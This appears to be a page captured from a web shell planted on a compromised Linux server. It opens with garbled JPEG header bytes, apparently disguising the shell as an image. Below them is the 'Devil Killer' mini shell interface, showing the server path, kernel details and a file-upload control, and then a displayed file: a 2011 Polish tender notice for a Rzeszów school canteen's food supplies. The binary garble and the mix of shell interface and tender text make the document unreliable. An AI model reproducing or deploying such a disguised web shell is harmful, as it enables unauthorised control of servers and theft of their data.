JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111205/318091-N-2011.html

<p class="kh_header"><b>Rzeszów: Dostawa do stołówki szkolnej artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 318091 - 2011; data zamieszczenia: 05.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Kształcenia Ustawicznego , ul. Sucharskiego 4, 35-225 Rzeszów, woj. podkarpackie, tel. 0-17 8520943, faks 0-17 8520943.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa do stołówki szkolnej artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż i dostawa do stołówki szkolnej artykułów żywnościowych z możliwością składania ofert częściowych .
Każda ze wskazanych poniżej części Zamówienia określana będzie mianem PAKIETU

1. PAKIET NR I   Mięso, Wędliny CPV  151 00000-9   
2. PAKIET NR II Produkty mleczarskie CPV   155 00000-3   
3. PAKIET NR III    Drób  CPV 15112000-6
4. PAKIET NR IV  Ryby Jaja Konserwy CPV 15131000-5
5. PAKIET NR V  Pieczywo i wyroby cukiernicze CPV  15811000-6
6. PAKIET NR VI Przyprawy CPV 15870000-7
7. PAKIET NR VII   Warzywa Owoce Napoje CPV 15300000-1 
8. PAKIET NR VIII Warzywa konserwowe lub puszkowe CPV 1531400-1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-8, 15.00.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ) - ocena spełnienia tego warunku  wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ) - ocena spełnienia tego warunku  wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ) - ocena spełnienia tego warunku  wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ) - ocena spełnienia tego warunku  wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez wykonawcę spełnienia  warunków zawartych w art.22 ust.1ustawy PZP, ubiegający się o udział w niniejszym postępowaniu musi wykazać poprzez złożenie oświadczenia, że spełnia warunki udziału w postępowaniu o których mowa w art. 22 ust.1 ustawy PZP ( zgodnie z załącznikiem nr 3 do SIWZ) - ocena spełnienia tego warunku  wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Oświadczenie, że osoby które zajmują się dostawą towaru posiadają aktualne badania do celów sanitarno - epidemiologicznych na druku załącznik nr 5 do SIWZ.

2 Oświadczenie potwierdzające, że oferowane artykuły są dopuszczone do obrotu na terenie Polski zgodnie z ustawą o warunkach zdrowotnych żywności i żywienia oraz że Wykonawca  wdrożył lub rozpoczął wdrażanie systemu HACCP na druku załącznik nr 6 do SIWZ.
 
3 Oświadczenie Wykonawcy o akceptacji ogólnych warunków umowy zawarte w projekcie umowy  oraz treści SIWZ- załącznik nr 7 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny jednostkowe mogą podlegać zmianie :
  a)   nie więcej niż wskaźnik wzrostu cen ogłoszony przez GUS po pierwszym kwartale
        - kwartał bieżący do analogicznego okresu roku poprzedniego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsku.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Kształcenia Ustawicznego w Rzeszowie
ul. Sucharskiego 4
35-225 Rzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2011 godzina 09:00, miejsce: Zespół Szkół Kształcenia Ustawicznego w Rzeszowie
ul. Sucharskiego 4
35-225 Rzeszów sekretariat nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1. PAKIET NR I   Mięso, Wędliny CPV  151 00000-9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MIĘSO WĘDLINY
L.p.	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto	Wartość
netto	Wartość
VAT	Wartość
brutto

1.	Schab b/k	kg	870				
2.	Karkówka	kg	200				
3.	Łopatka b/k	kg	462				
4.	Żeberka	kg	50				
5.	Boczek wędzony	kg	50				
6.	Mięso od szynki	kg	239				
7. 	Szynka konserwowa	kg	450				
8.	Szynka gotowana	kg	300				
9. 	Szynka staropolska	kg	347				
10.	Polędwica sopocka	kg	574				
11.	Schabik wieprzowy.	kg	92				
12.	Szynka wieprzowa	kg	164				
13.	Szynka chłopska	kg	46				
14. 	Kiełbasa zwyczajna	kg	200				
15.	Kiełbasa podwawelska	kg	600				
16.	Krakowska parzona	kg	349				
17.	Kiełbasa szynkowa	kg	300				
18.	Pasztet pieczony	kg	200		
		
19.         	Parówka gruba	kg	90				
20. 	Parówka cienka	kg	100				
21.	Kabanosy	  kg	50				
22.	Kornetki	kg	250				
23. 	Kiełbasa wiejska	kg	50				
24	Szynka laurowa	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2. PAKIET NR II Produkty mleczarskie CPV   155 00000-3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto	Wartość
netto	Wartość
VAT	Wartość
brutto

1.	Mleko 2% butelka - 1l.	l	4088				
2.	Masło Extra 82%-200g.	szt	1064				
3.	Ser biały do chleba w kubku-100g. naturalny,warzywa, papryka, szczypiorek,pieprz	szt	500				
4.	Ser fromage 100g.	szt	200				
5.	Serek twarogowy ziarnisty 200g.	szt	900				
6.	Serek puszysty twarogowy 150g.różne smaki (kubek)	szt	500				
7.	Ser sałatkowo-kanapkowy Fetta 270g.	szt	250				
8. 	Ser żółty Rydzki	kg	263				
9.	Serek plastry 150g.	szt	2500				
10.	 Śmietana 18% -250ml.	szt	 700				
11.	Ser żółty Gouda	kg	670				
12.	Ser żółty Salami	kg	800				
13. 	Krem kanapkowy 180g
Pyszny Duet	szt	1400				
14.	Serki topione 100g	szt	1000				
15.	Kefir luksusowy 2% 250g.	szt	360				
16.	Jogurt naturalny 180g.	szt	400				
17.	Jogurt owocowy 125g.	szt	500				
18.	Jogurt owocowy 250ml	szt	500				
19.	Jogurt owocowy 150ml.	szt	1000				
20	Serek śmietankowy naturalny 125g	szt	700				
21	Margaryna zwykła 250g.	szt	144				
22	Masło roślinne 500g	szt	250				
23	Twaróg półtłusty	kg	800				
24	Twarożek wiejski 200g	szt	100				
25	Jogurt 122g owocowe	szt	360				
26	Jogurt owocowa wyspa 150g	szt	963				
27	Jogurt 7 zbóż 180g.	szt	445				
28	Serek Danio mix smaków 140g.	szt	200				
29	Serki Topione 25g.	szt	3240				
30	Ser żółtyWłoszczowski typ Szwajcarski	kg	150				
31	Ser wędzony	kg	50				
32	Ser kremowy typu Camembert 120 g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3. PAKIET NR III    Drób  CPV 15112000-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto	Wartość
netto	Wartość
VAT	Wartość
brutto

1.	Kurczak 	kg	400				
2.	Piersi z kurczaka	kg	741				
3.	Udka z kurczaka	kg	550				
4.	Kości kulinarne	kg	100                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            				
                                                       WARTOŚĆ RAZEM:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 4. PAKIET NR IV  Ryby Jaja Konserwy CPV 15131000-5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto	Wartość
netto	Wartość
VAT	Wartość
brutto

1.	Ryba wędzona Makrela	kg	46				
2.	Filet mrożony Mintaj	kg	368				
3	Filet mrożony Tilapia	kg	180				
4.	Makrela w pomidorach -300g	szt	997				
5.	Filet śledziowy -2,5 kg	kg	250				
6.	Gulasz Angielski-290g	szt	671				
7.	Mielonka -300g	szt	300				
8.	Pasztet z drobiu-155g	szt	1840				
9.	Jaja 63-73 kl. L	   szt	16700				
  10.	Tuńczyk kawałki -170g
w oleju	  szt	 378				
11	Filet śledziowy Matias 	 kg	50				
  12	Szynka  mielona 130g	 szt	200				
   13	Gulasz Angielski 130g	  szt	200				
14 	Filet z Makreli 170g	szt	300				
15	Paprykarz 170g	  szt	289				
16	Pasztet z drobiu 131g	  szt	117				
17	Szynka drobiowa 110g	  szt	1543				
18	Szynka z indyka 110g	szt	350				
19	Pasta z Łososia 100g	szt	200				
20	Pasztet z Drobiu 50g	szt	2300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 5. PAKIET NR V  Pieczywo i wyroby cukiernicze CPV  15811000-6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto	Wartość
netto	Wartość
VAT	Wartość
brutto

1.	Chleb krojony 0,7 kg	szt	8510				
2.	Bułka pszenna 100g	szt	13550				
3.	Bułka grahamka 100g	szt	13550				
4.	Bułka tarta	kg	350				
5	Bułka z ziarnem 90g	szt	380				
6	Sztangiel pszenny 90g	szt	200				
7	Chleb graham 0,5 kg	szt	1700				
8	Kapuśniak100g	szt	600				
9	Pasztecik100g	szt	600				
10.	Drożdżówka 100g	szt	2000				
11	Rogale słodkie 110g	szt	380				
12	Pączek 80g	szt	1700				
13 	Kremówka	kg	30				
14	Szarlotka	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 6. PAKIET NR VI Przyprawy CPV 15870000-7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa produktu	J.m.	Ilość	Cena
Jedn. netto	Wartość
netto	Wartość
VAT	Wartość
brutto

1.	Mąka  -1kg	kg	546				
2.	Makaron nitki, świderki-2kg	kg	503				
3.	Kasza jęczmienna-1kg	kg	480				
4.	Cukier-1kg	kg	1500				
5.	Ryż-1kg	kg	427				
6.	Sól-1kg	kg	200				
7.	Pieprz op. po 20g	szt	500				
8.	Kucharek- 200g	szt	344				
9.	Majeranek op. po 15g	szt	70				
10.	Ziele angielskie-15g	szt	50				
11.	Rosołki drobiowe -180g	szt	264				
12.	Kminek 20g	szt	60				
13.	Maga -1l	szt	82				
14.	Ocet- 0,5l	szt	50				
15.	Olej -1l. uniwersalny	szt	100				
16.	Kakao-100g	szt	90				
17.	Kawa Inka-150g	szt	70				
18.	Kwasek cytrynowy-20g	szt	95				
19.	Dżem - 6 kg	kg	314				
20.	Herbata  gran. -90g	szt	250				
.21.	Krem czekoladowy-230g	szt	300				
22.	Makaron Łazankowy  500g	kg	70				
23.	Bulion grzybowy -60g	szt	88				
24.	Papryka suszona-20g	szt	100				
25.	Żelatyna-50g	szt	50				
26.	Sos pieczeniowy-38g	szt	160				
27.	Sos sałatkowy-9g	szt	350				
28	Ketchup -480ml.	szt	194				
29.	Majonez -260g	szt	1400				
30.	Liście laurowe-6g	szt	50				
31.	Płatki kukurydziane  -500g	szt	107				
32.	Kasza manna -500g	kg	20				
33.	Mąka ziemniaczana-500g	kg	24				
 34.	Zioła prowansalskie-10g	szt	50				
35.	Makaron muszelki
(drobny   500g	kg	60				
36.	Kasza gryczana 500g	kg	100				
37. 	Pieprz ziołowy 20g	szt	75				
38.	Bazylia 10g	szt	30				
39.	Olej Rzepakowy 1l	szt	280				
40.	Olej Słonecznikowy 1l	szt	300				
41.	Przyprawa do ryb 20g	szt	30				
42.	Kurkuma mielona 15g	szt	20				
43.	Przyprawa kebab-gyros - 30g	szt	50				
44. 	Cukier Waniliowy 16 g	szt	40				
45.	Kisiel różne smaki  -38g	szt	100				
46.	Budynie  40g	szt	50				
47.	Galaretki owocowe  75g 	szt	60				
48.	Koncentrat barszczu czerwonego  300ml	szt	50				
49.	Płatki zbożowe z miodem  250g	szt	50				
 50.	Płatki zbożowe z czekoladą  500g	szt	50				
  51.	Płatki zbożowe (owoce i błonnik) 250g	szt	40				
52.	Kisiel z kawałkami owoców 30g	szt	380.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> . PAKIET NR VII   Warzywa Owoce Napoje CPV 15300000-1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Jabłka	kg	100			
2.	Cytryny	kg	63			
3.	Banany	kg	700			
4.	Szczypiorek pęk	szt	526			
5.	Cebula	kg	560			
6.	Cebula zielona pęk	szt	50			
7.	Kapusta kwaszona	kg	500			
8.	Kapusta świeża	szt	50			
9.	Kapusta biała	kg	660			
10.	Kapusta czerwona	kg	200			
11.	Kapusta pekińska	szt	794			
12.	Rzodkiewka pęk	szt	150			
13.	Pieczarki świeże	kg	154			
14.	Pomidory	kg	720			
15.	Ogórki kwaszone	kg	150			
16.	Ogórki świeże	kg	200			
17.	Sałata zielona	szt	1000			
18.	Marchew	kg	2100			
19.	Burak ćwikłowy	kg	600			
20.	Seler korzeń	kg	420			
21.	Natka pietruszki	szt	450			
22.	Fasola karłowa Jaś	kg	142			
23.	Groch łuszczony	kg	135			
24.	Czosnek	kg	13			
25	Ziemniaki	kg	10900			
26	Sok -300ml.	szt	2000			
27	Papryka świeża	kg	100			
28.	Pietruszka korzeń	kg	160			
29.	Mandarynki	kg	200			
30.	Klementynki	kg	290			
31	Winogrono białe	kg	200			
32	Winogrono ciemne	kg	200			
33.	Koper pęk	szt	30			
34.	Sok pomidorowy -330ml	szt	200			
